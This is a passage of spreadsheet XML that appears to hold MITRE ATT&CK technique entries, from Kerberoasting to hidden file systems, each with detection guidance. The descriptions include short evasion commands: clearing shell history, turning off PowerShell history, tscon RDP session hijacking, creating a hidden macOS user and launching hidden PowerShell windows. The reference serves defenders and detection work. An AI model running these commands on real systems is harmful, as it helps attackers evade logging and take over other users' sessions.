    <t>T1558.003</t>
  </si>
  <si>
    <t>Kerberoasting</t>
  </si>
  <si>
    <t>Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: AdSecurity Cracking Kerberos Dec 2015)</t>
  </si>
  <si>
    <t>Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) 
Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016)
Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: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credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)
This same attack could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015)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</si>
  <si>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T1558.004</t>
  </si>
  <si>
    <t>AS-REP Roasting</t>
  </si>
  <si>
    <t>Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17], pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: Microsoft 4768 TGT 2017)</t>
  </si>
  <si>
    <t>Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) 
Preauthentication offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.(Citation: Microsoft Kerberos Preauth 2014)
For each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) 
An account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)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</si>
  <si>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T1559</t>
  </si>
  <si>
    <t>Inter-Process Communication</t>
  </si>
  <si>
    <t>Process monitoring,DLL monitoring,File monitoring</t>
  </si>
  <si>
    <t>Monitor for strings in files/commands, loaded DLLs/libraries, or spawned processes that are associated with abuse of IPC mechanisms.</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</si>
  <si>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 
Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms.</t>
  </si>
  <si>
    <t>T1559.001</t>
  </si>
  <si>
    <t>Component Object Model</t>
  </si>
  <si>
    <t>Process monitoring,DLL monitoring</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)
Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on. </t>
  </si>
  <si>
    <t>Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC)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binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM)
Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)</t>
  </si>
  <si>
    <t>T1559.002</t>
  </si>
  <si>
    <t>Dynamic Data Exchange</t>
  </si>
  <si>
    <t>Monitor processes for abnormal behavior indicative of DDE abuse, such as Microsoft Office applications loading DLLs and other modules not typically associated with the application or these applications spawning unusual processes (such as cmd.exe).
OLE and Office Open XML files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution.(Citation: NVisio Labs DDE Detection Oct 2017)</t>
  </si>
  <si>
    <t>Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands.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[Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)
Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).</t>
  </si>
  <si>
    <t>T1560</t>
  </si>
  <si>
    <t>Archive Collected Data</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,File monitoring,Binary file metadata</t>
  </si>
  <si>
    <t>Archival software and archived files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
A process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures.
Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)</t>
  </si>
  <si>
    <t>An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.</t>
  </si>
  <si>
    <t>T1560.001</t>
  </si>
  <si>
    <t>Archive via Utility</t>
  </si>
  <si>
    <t>Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)</t>
  </si>
  <si>
    <t>An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt and/or compress data.
Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or `zip` on Windows systems.</t>
  </si>
  <si>
    <t>T1560.002</t>
  </si>
  <si>
    <t>Archive via Library</t>
  </si>
  <si>
    <t>Monitor processes for accesses to known archival libraries. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)</t>
  </si>
  <si>
    <t>An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.</t>
  </si>
  <si>
    <t>T1560.003</t>
  </si>
  <si>
    <t>Archive via Custom Method</t>
  </si>
  <si>
    <t>Custom archival methods can be very difficult to detect, since many of them use standard programming language concepts, such as bitwise operations.</t>
  </si>
  <si>
    <t>An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>T1561</t>
  </si>
  <si>
    <t>Disk Wipe</t>
  </si>
  <si>
    <t>Kernel drivers,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Look for attempts to read/write to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the &lt;code&gt;\\\\.\\&lt;/code&gt; notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.</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</si>
  <si>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
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks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t>
  </si>
  <si>
    <t>T1561.001</t>
  </si>
  <si>
    <t>Disk Content Wipe</t>
  </si>
  <si>
    <t>Look for attempts to read/write to sensitive locations like the partition boot sector or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the &lt;code&gt;\\\\.\\&lt;/code&gt; notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.</t>
  </si>
  <si>
    <t>Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.
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are erased instead of individual files.
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t>
  </si>
  <si>
    <t>T1561.002</t>
  </si>
  <si>
    <t>Disk Structure Wipe</t>
  </si>
  <si>
    <t>Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for direct access read/write attempts using the &lt;code&gt;\\\\.\\&lt;/code&gt; notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.</t>
  </si>
  <si>
    <t>Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. 
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Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.
To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other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t>
  </si>
  <si>
    <t>T1562</t>
  </si>
  <si>
    <t>Impair Defenses</t>
  </si>
  <si>
    <t>GCP audit logs,Azure activity logs,AWS CloudTrail logs,Anti-virus,Services,API monitoring,Environment variable,Authentication logs,File monitoring,Process command-line parameters,Process monitoring,Windows Registry</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools.  Lack of log events may be suspicious.
Monitor environment variables and APIs that can be leveraged to disable security measures.</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</si>
  <si>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
Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.</t>
  </si>
  <si>
    <t>Anti-virus,Signature-based detection,Host intrusion prevention systems,File monitoring,Digital Certificate Validation,Host forensic analysis,Log analysis,Firewall</t>
  </si>
  <si>
    <t>T1562.001</t>
  </si>
  <si>
    <t>Disable or Modify Tools</t>
  </si>
  <si>
    <t>Process command-line parameters,Windows Registry,Services,File monitoring</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if security tools are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious.</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</si>
  <si>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tools scanning or reporting information.</t>
  </si>
  <si>
    <t>Anti-virus,Log analysis,Signature-based detection,Host intrusion prevention systems,File monitoring</t>
  </si>
  <si>
    <t>T1562.002</t>
  </si>
  <si>
    <t>Disable Windows Event Logging</t>
  </si>
  <si>
    <t>Process monitoring,Windows event logs,Process command-line parameters</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for commands that can be used to disable logging. Lack of event logs may be suspicious.</t>
  </si>
  <si>
    <t>Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.
Adversaries may targeting system-wide logging or just that of a particular application. By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.</t>
  </si>
  <si>
    <t>T1562.003</t>
  </si>
  <si>
    <t>Impair Command History Logging</t>
  </si>
  <si>
    <t>PowerShell logs,Process command-line parameters,Environment variable,File monitoring,Authentication logs,Process monitoring</t>
  </si>
  <si>
    <t xml:space="preserve">Correlating a user session with a distinct lack of new commands in their &lt;code&gt;.bash_history&lt;/code&gt; can be a clue to suspicious behavior. Additionally, users checking or changing their &lt;code&gt;HISTCONTROL&lt;/code&gt;, &lt;code&gt;HISTFILE&lt;/code&gt;, or &lt;code&gt;HISTFILESIZE&lt;/code&gt; environment variables may be suspicious.
Monitor for modification of PowerShell command history settings through processes being created with &lt;code&gt;-HistorySaveStyle SaveNothing&lt;/code&gt; command-line arguments and use of the PowerShell commands &lt;code&gt;Set-PSReadlineOption -HistorySaveStyle SaveNothing&lt;/code&gt; and &lt;code&gt;Set-PSReadLineOption -HistorySavePath {File Path}&lt;/code&gt;. </t>
  </si>
  <si>
    <t>Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. 
On Linux and macOS, command history is tracked in a file pointed to by the environment variable &lt;code&gt;HISTFILE&lt;/code&gt;. When a user logs off a system, this information is flushed to a file in the user's home directory called &lt;code&gt;~/.bash_history&lt;/code&gt;. The &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable keeps track of what should be saved by the &lt;code&gt;history&lt;/code&gt; command and eventually into the &lt;code&gt;~/.bash_history&lt;/code&gt; file when a user logs out. &lt;code&gt;HISTCONTROL&lt;/code&gt; does not exist by default on macOS, but can be set by the user and will be respected.
Adversaries may clear the history environment variable (&lt;code&gt;unset HISTFILE&lt;/code&gt;) or set the command history size to zero (&lt;code&gt;export HISTFILESIZE=0&lt;/code&gt;) to prevent logging of commands. Additionally, &lt;code&gt;HISTCONTROL&lt;/code&gt;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Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.
On Windows systems, the &lt;code&gt;PSReadLine&lt;/code&gt; module tracks commands used in all PowerShell sessions and writes them to a file (&lt;code&gt;$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt&lt;/code&gt; by default). Adversaries may change where these logs are saved using &lt;code&gt;Set-PSReadLineOption -HistorySavePath {File Path}&lt;/code&gt;. This will cause &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command &lt;code&gt;Set-PSReadlineOption -HistorySaveStyle SaveNothing&lt;/code&gt;.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)</t>
  </si>
  <si>
    <t>T1562.004</t>
  </si>
  <si>
    <t>Disable or Modify System Firewall</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Windows Registry</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if firewalls are disabled or modified. Monitor Registry edits to keys that manage firewalls.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. </t>
  </si>
  <si>
    <t>T1562.006</t>
  </si>
  <si>
    <t>Indicator Blocking</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,Sensor health and status</t>
  </si>
  <si>
    <t>Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data.
Depending on the types of host information collected, an analyst may be able to detect the event that triggered a process to stop or connection to be blocked. For example, Sysmon will log when its configuration state has changed (Event ID 16) and Windows Management Instrumentation (WMI) may be used to subscribe ETW providers that log any provider removal from a specific trace session. (Citation: Medium Event Tracing Tampering 2018) To detect changes in ETW you can also monitor the registry key which contains configurations for all ETW event providers: &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID}&lt;/code&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).
ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) &lt;code&gt;Set-EtwTraceProvider&lt;/code&gt; cmdlet or by interfacing directly with the Registry to make alterations.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 </t>
  </si>
  <si>
    <t>Host intrusion prevention systems,Anti-virus,Anti-virus</t>
  </si>
  <si>
    <t>T1562.007</t>
  </si>
  <si>
    <t>Disable or Modify Cloud Firewall</t>
  </si>
  <si>
    <t>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</t>
  </si>
  <si>
    <t>Monitor cloud logs for modification or creation of new security groups or firewall rules.</t>
  </si>
  <si>
    <t>Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). 
Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity.(Citation: Expel IO Evil in AWS)
Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.</t>
  </si>
  <si>
    <t>T1562.008</t>
  </si>
  <si>
    <t>Disable Cloud Logs</t>
  </si>
  <si>
    <t>AWS CloudTrail logs,Azure activity logs,GCP audit logs</t>
  </si>
  <si>
    <t>Monitor logs for API calls to disable logging. In AWS, monitor for: &lt;code&gt;StopLogging&lt;/code&gt; and &lt;code&gt;DeleteTrail&lt;/code&gt;.(Citation: Stopping CloudTrail from Sending Events to CloudWatch Logs) In GCP, monitor for: &lt;code&gt;google.logging.v2.ConfigServiceV2.UpdateSink&lt;/code&gt;.(Citation: Configuring Data Access audit logs)  In Azure, monitor for &lt;code&gt;az monitor diagnostic-settings delete&lt;/code&gt;.(Citation: az monitor diagnostic-settings) Additionally, a sudden loss of a log source may indicate that it has been disabled.</t>
  </si>
  <si>
    <t>An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. 
Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an attacker has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic)</t>
  </si>
  <si>
    <t>T1563</t>
  </si>
  <si>
    <t>Remote Service Session Hijacking</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,Netflow/Enclave netflow,Authentication logs</t>
  </si>
  <si>
    <t>Use of these services may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with that service. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.
Monitor for processes and command-line arguments associated with hijacking service sessions.</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</si>
  <si>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
Adversaries may commandeer these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://attack.mitre.org/techniques/T1563) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it hijacks an existing session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: RDP Hijacking Medium)(Citation: Breach Post-mortem SSH Hijack)</t>
  </si>
  <si>
    <t>T1563.001</t>
  </si>
  <si>
    <t>SSH Hijacking</t>
  </si>
  <si>
    <t>Use of SSH may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. Also monitor user SSH-agent socket files being used by different users.</t>
  </si>
  <si>
    <t>Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. 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trivial.(Citation: Slideshare Abusing SSH)(Citation: SSHjack Blackhat)(Citation: Clockwork SSH Agent Hijacking)(Citation: Breach Post-mortem SSH Hijack)
[SSH Hijacking](https://attack.mitre.org/techniques/T1563/001) differs from use of [SSH](https://attack.mitre.org/techniques/T1021/004) because it hijacks an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t>T1563.002</t>
  </si>
  <si>
    <t>RDP Hijacking</t>
  </si>
  <si>
    <t>Consider monitoring processes for `tscon.exe` usage and monitor service creation that uses `cmd.exe /k` or `cmd.exe /c` in its arguments to detect RDP session hijacking.
Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.</t>
  </si>
  <si>
    <t>Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment.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perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, `c:\windows\system32\tscon.exe [session number to be stolen]`, an adversary can hijack a session without the need for credentials or prompts to the user.(Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions.(Citation: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 teaming tools.(Citation: Kali Redsnarf)</t>
  </si>
  <si>
    <t>T1564</t>
  </si>
  <si>
    <t>Hide Artifacts</t>
  </si>
  <si>
    <t>API monitoring,PowerShell logs,Authentication logs,Process command-line parameters,Process monitoring,File monitoring</t>
  </si>
  <si>
    <t>Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell commands for hidden attribute usage.</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</si>
  <si>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detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>T1564.001</t>
  </si>
  <si>
    <t>Hidden Files and Directories</t>
  </si>
  <si>
    <t>Monitor the file system and shell commands for files being created with a leading "." and the Windows command-line use of attrib.exe to add the hidden attribute.</t>
  </si>
  <si>
    <t>Adversaries may set files and directories to be hidden to evade detection mechanisms. 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On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name  (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”.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and evading a typical user or system analysis that does not incorporate investigation of hidden files.</t>
  </si>
  <si>
    <t>T1564.002</t>
  </si>
  <si>
    <t>Hidden Users</t>
  </si>
  <si>
    <t>File monitoring,Authentication logs</t>
  </si>
  <si>
    <t>This technique prevents the new user from showing up at the log in screen, but all of the other signs of a new user still exist. The user still gets a home directory and will appear in the authentication logs.</t>
  </si>
  <si>
    <t>Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account.
There is a property value in &lt;code&gt;/Library/Preferences/com.apple.loginwindow&lt;/code&gt; called &lt;code&gt;Hide500Users&lt;/code&gt; that prevents users with userIDs 500 and lower from appearing at the login screen. When using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 (ex: &lt;code&gt;sudo dscl . -create /Users/username UniqueID 401&lt;/code&gt;) and enabling this property (setting it to Yes), an adversary can conceal user accounts. (Citation: Cybereason OSX Pirrit).</t>
  </si>
  <si>
    <t>T1564.003</t>
  </si>
  <si>
    <t>Hidden Window</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters,PowerShell logs</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions indicative of hidden windows. In Windows, enable and configure event logging and PowerShell logging to check for the hidden window style. In MacOS, plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the &lt;code&gt;apple.awt.UIElement&lt;/code&gt; or any other suspicious plist tag in plist files and flag them.</t>
  </si>
  <si>
    <t>Adversaries may use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 
On Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is &lt;code&gt;powershell.exe -WindowStyle Hidden&lt;/code&gt;. (Citation: PowerShell About 2019)
Similarly, on macOS the configurations for how applications run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Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)</t>
  </si>
  <si>
    <t>T1564.004</t>
  </si>
  <si>
    <t>NTFS File Attributes</t>
  </si>
  <si>
    <t>Process command-line parameters,API monitoring,File monitoring</t>
  </si>
  <si>
    <t>Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA) Monitor calls to the &lt;code&gt;ZwSetEaFile&lt;/code&gt; and &lt;code&gt;ZwQueryEaFile&lt;/code&gt; Windows API functions as well as binaries used to interact with EA, (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) and consider regularly scanning for the presence of modified information. (Citation: SpectorOps Host-Based Jul 2017)
There are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: &lt;code&gt;file.ext:ads[.ext]&lt;/code&gt;) is commonly associated with ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.
The Streams tool of Sysinternals can be used to uncover files with ADSs. The &lt;code&gt;dir /r&lt;/code&gt; command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a &lt;code&gt;-stream&lt;/code&gt; parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)</t>
  </si>
  <si>
    <t>Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. 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t>
  </si>
  <si>
    <t>Anti-virus,Host forensic analysis,Signature-based detection</t>
  </si>
  <si>
    <t>T1564.005</t>
  </si>
  <si>
    <t>Hidden File System</t>
  </si>
  <si>
    <t>File monitoring,Windows Registry</t>
  </si>
  <si>
    <t>Detecting the use of a hidden file system may be exceptionally difficult depending on the implementation. Emphasis may be placed on detecting related aspects of the adversary lifecycle, such as how malware interacts with the hidden file system or how a hidden file system is loaded. Consider looking for anomalous interactions with the Registry or with a particular file on disk. Likewise, if the hidden file system is loaded on boot from reserved disk space, consider shifting focus to detecting [Bootkit](https://attack.mitre.org/techniques/T1542/003) activity.</t>
  </si>
  <si>
